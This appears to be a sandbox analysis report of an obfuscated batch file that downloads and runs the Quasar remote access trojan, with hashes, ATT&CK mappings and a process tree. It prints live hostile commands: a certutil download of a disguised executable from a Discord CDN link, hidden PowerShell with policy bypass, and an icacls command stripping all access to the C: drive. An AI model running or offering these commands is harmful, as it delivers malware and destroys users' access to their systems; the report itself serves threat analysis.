quasar | 56dc2b78268152ae625035e026b5e43c269c9e440cbe1015f840200ee2cd4d6a

General

Target

Fix-obf.bat
Size

24KB
MD5

f5309c94ee64f81d31a70a0f40e94cf9
SHA1

906f9f8557ccaef4d911d4274384493bfcc07c8f
SHA256

56dc2b78268152ae625035e026b5e43c269c9e440cbe1015f840200ee2cd4d6a
SHA512

0a58546adab1abebd91c294c127e655db059559a385d26d495ee945caa071fbe878c80dc8269afca2baaa93477cbbeef496a293caac6ac1d88016f7a51756de2
SSDEEP

384:UH02YgJBHbbQzpSLXNR8uWc5wu+ChsaguUvT27jxixHlLQ1vyk0dC:OyQHbbmpK9muWc5wu+ChstuUvyhi7k3

Score

10^/10

quasar discovery execution spyware trojan

Malware Config

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Client-built-protected.exe	family_quasar
behavioral1/memory/2672-66-0x00000000013A0000-0x0000000001D62000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2604 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

powershell.exeClient-built-protected.exeClient-built-protected.exe

pid process

2604 powershell.exe
2672 Client-built-protected.exe
2560 Client-built-protected.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

2604 powershell.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2116 icacls.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1612 PING.EXE
2216 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2604 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Client-built-protected.exeClient-built-protected.exe

description pid process

Token: SeDebugPrivilege 2672 Client-built-protected.exe
Token: SeDebugPrivilege 2560 Client-built-protected.exe

pid	process
2604	powershell.exe

pid	process
2604	powershell.exe
2672	Client-built-protected.exe
2560	Client-built-protected.exe

pid	process
2604	powershell.exe

pid	process
2116	icacls.exe

pid	process
1612	PING.EXE
2216	PING.EXE

pid	process
2604	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2672	Client-built-protected.exe
Token: SeDebugPrivilege	2560	Client-built-protected.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeClient-built-protected.execmd.exeClient-built-protected.execmd.exe

description	pid	process	target process
PID 1040 wrote to memory of 2708	1040	cmd.exe	chcp.com
PID 1040 wrote to memory of 2708	1040	cmd.exe	chcp.com
PID 1040 wrote to memory of 2708	1040	cmd.exe	chcp.com
PID 1040 wrote to memory of 2176	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2176	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2176	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2456	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2456	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2456	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2936	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2936	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2936	1040	cmd.exe	find.exe
PID 1040 wrote to memory of 2872	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2872	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2872	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2888	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2888	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2888	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2508	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2508	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2508	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2472	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2472	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2472	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2572	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2572	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2572	1040	cmd.exe	cmd.exe
PID 1040 wrote to memory of 2584	1040	cmd.exe	certutil.exe
PID 1040 wrote to memory of 2584	1040	cmd.exe	certutil.exe
PID 1040 wrote to memory of 2584	1040	cmd.exe	certutil.exe
PID 1040 wrote to memory of 2604	1040	cmd.exe	powershell.exe
PID 1040 wrote to memory of 2604	1040	cmd.exe	powershell.exe
PID 1040 wrote to memory of 2604	1040	cmd.exe	powershell.exe
PID 1040 wrote to memory of 2604	1040	cmd.exe	powershell.exe
PID 2604 wrote to memory of 2672	2604	powershell.exe	Client-built-protected.exe
PID 2604 wrote to memory of 2672	2604	powershell.exe	Client-built-protected.exe
PID 2604 wrote to memory of 2672	2604	powershell.exe	Client-built-protected.exe
PID 2604 wrote to memory of 2672	2604	powershell.exe	Client-built-protected.exe
PID 1040 wrote to memory of 2116	1040	cmd.exe	icacls.exe
PID 1040 wrote to memory of 2116	1040	cmd.exe	icacls.exe
PID 1040 wrote to memory of 2116	1040	cmd.exe	icacls.exe
PID 1040 wrote to memory of 1484	1040	cmd.exe	reg.exe
PID 1040 wrote to memory of 1484	1040	cmd.exe	reg.exe
PID 1040 wrote to memory of 1484	1040	cmd.exe	reg.exe
PID 1040 wrote to memory of 2248	1040	cmd.exe	attrib.exe
PID 1040 wrote to memory of 2248	1040	cmd.exe	attrib.exe
PID 1040 wrote to memory of 2248	1040	cmd.exe	attrib.exe
PID 2672 wrote to memory of 1596	2672	Client-built-protected.exe	cmd.exe
PID 2672 wrote to memory of 1596	2672	Client-built-protected.exe	cmd.exe
PID 2672 wrote to memory of 1596	2672	Client-built-protected.exe	cmd.exe
PID 1596 wrote to memory of 2128	1596	cmd.exe	chcp.com
PID 1596 wrote to memory of 2128	1596	cmd.exe	chcp.com
PID 1596 wrote to memory of 2128	1596	cmd.exe	chcp.com
PID 1596 wrote to memory of 1612	1596	cmd.exe	PING.EXE
PID 1596 wrote to memory of 1612	1596	cmd.exe	PING.EXE
PID 1596 wrote to memory of 1612	1596	cmd.exe	PING.EXE
PID 1596 wrote to memory of 2560	1596	cmd.exe	Client-built-protected.exe
PID 1596 wrote to memory of 2560	1596	cmd.exe	Client-built-protected.exe
PID 1596 wrote to memory of 2560	1596	cmd.exe	Client-built-protected.exe
PID 2560 wrote to memory of 2464	2560	Client-built-protected.exe	cmd.exe
PID 2560 wrote to memory of 2464	2560	Client-built-protected.exe	cmd.exe
PID 2560 wrote to memory of 2464	2560	Client-built-protected.exe	cmd.exe
PID 2464 wrote to memory of 1972	2464	cmd.exe	chcp.com
PID 2464 wrote to memory of 1972	2464	cmd.exe	chcp.com

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2248 attrib.exe

pid	process
2248	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\system32\chcp.com
chcp.com 437
2⤵
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type tmp
2⤵
PID:2176

C:\Windows\system32\find.exe
fiNd
2⤵
PID:2456

C:\Windows\system32\find.exe
find
2⤵
PID:2936

C:\Windows\system32\findstr.exe
fIndstr /L /I set C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
2⤵
PID:2872

C:\Windows\system32\findstr.exe
fIndstr /L /I goto C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
2⤵
PID:2888

C:\Windows\system32\findstr.exe
fIndstr /L /I echo C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
2⤵
PID:2508

C:\Windows\system32\findstr.exe
fIndstr /L /I pause C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
2⤵
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type tmp
2⤵
PID:2572

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1226567617460834426/1239292701342568478/powershell.exe?ex=664264c4&is=66411344&hm=fcd37859de3b6c8829472934914951187ed8f6f60ab3b241cc31cc1496709620&" powershell.exe
2⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'powershell.exe' -Verb RunAs"
2⤵
- Command and Scripting Interpreter: PowerShell
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2604

C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AvvsKpSCxBDN.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:2128

C:\Windows\system32\PING.EXE
ping -n 10 localhost
5⤵
- Runs ping.exe
PID:1612

C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RUrvai7xCTZD.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:1972

C:\Windows\system32\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:2216

C:\Windows\system32\icacls.exe
icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
2⤵
- Modifies file permissions
PID:2116

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
2⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat"
2⤵
- Views/modifies file attributes
PID:2248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\AvvsKpSCxBDN.bat

Filesize
219B

MD5
71d4e8e48dc6e9c539dca007f18b6e30

SHA1
1e6afc36b3e0e08b4329f255fdcf1ba9925c97fd

SHA256
c14bdd0443a27e31097bba121684ccc02cef43960d362abcc60a70d2912d1e11

SHA512
791bd007b3520b97b13a6a6ed24aad3de2f16110e7b6ea660acd6d8fe49712b5aa5e443571cc4ba76623fc44b03eda8f4f8c8cc3e05059bf0571b7efd5fa514e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RUrvai7xCTZD.bat

Filesize
219B

MD5
78f2c254686fdb1b07c9fba937ec5177

SHA1
71a1703d88de0a0aaa3495c181fc247523aa86c5

SHA256
18766d1038158abcb2d0f6ee022483dfeda88792c5ca8d835e670f9201fafb0f

SHA512
81c238c176b96db836631a0e9f7b93dd34ade5f40624b02386af3c74d2521d516b0433277af0ccfdbfb618d03c8ddacc283dae53876855516555a01d825fbc98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar24E7.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell.exe

Filesize
9.7MB

MD5
8a2cfa3d50cdae74c192a6f24fcb1eea

SHA1
e703dc2b5b7f5649dc0ec2e95675777185af6070

SHA256
e90463a2ced2b7fe89a803b631b70c22cdf6e2c8ab13c7c6bdce81b2d214d4d4

SHA512
6a185174d96234f07d937790ddf0cd6cc835b01f2c60e43fe28b079bec984a5f488224e4b3f44cff8ac5553e639b8435af738346cedd08dd6e27df120b4aa663

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
\Users\Admin\AppData\Local\Temp\Client-built-protected.exe

Filesize
9.7MB

MD5
65eec69db9c4307091f083bda41eee41

SHA1
1bd546ca74734565dbd5186e84a797a8d3598126

SHA256
f6c8f94e2492ec47cc46a2845cb596b4a318cba4a546bbfb8b6b4df4d073a878

SHA512
268712a46cecdd14a4b47b705aa8adbf8d81534d54e25d4bd819aac18ddcd4cc4f9d2b4ee29754185c4b0cabbe893ae9d2cdc97bba2e7ff7097e28ba18c91cad

Download Submit
memory/2672-66-0x00000000013A0000-0x0000000001D62000-memory.dmp

Filesize
9.8MB

Download

Analysis

Sharing